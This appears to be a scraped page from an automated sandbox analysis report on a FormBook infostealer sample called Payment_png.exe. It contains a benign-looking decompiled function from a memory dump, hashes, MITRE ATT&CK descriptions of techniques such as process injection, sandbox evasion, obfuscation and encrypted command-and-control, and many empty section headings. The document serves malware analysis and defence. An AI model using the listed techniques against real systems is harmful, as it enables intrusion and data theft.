Uniqueness Score: -1.00%

Non-executed Functions

Function 04C9FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04C9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04C4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04C95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04C95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04c9fdda
0x04c9fde2
0x04c9fde5
0x04c9fdec
0x04c9fdfa
0x04c9fdff
0x04c9fe0a
0x04c9fe0f
0x04c9fe17
0x04c9fe1e
0x04c9fe19
0x04c9fe19
0x04c9fe19
0x04c9fe20
0x04c9fe21
0x04c9fe22
0x04c9fe25
0x04c9fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C9FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C9FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C9FE2B

Memory Dump Source

Source File: 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp, Offset: 04BE0000, based on PE: true

Associated: 0000000E.00000002.471456843.0000000004CFB000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.471466151.0000000004CFF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: c19499d544f3543fb389ffc453bb0172b11414663574a42b43b255ae336c4a0e
Instruction ID: cf56c4d20062ff8dd951cd9fc6937f9eaad8fe60260f4b2394060498dc234d48
Opcode Fuzzy Hash: c19499d544f3543fb389ffc453bb0172b11414663574a42b43b255ae336c4a0e
Instruction Fuzzy Hash: 53F0F632240242BFEA251A45DC0AF23BBABEB44730F150354F628961E1EA62FD2097F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Payment_png.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 00401378, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
COMMON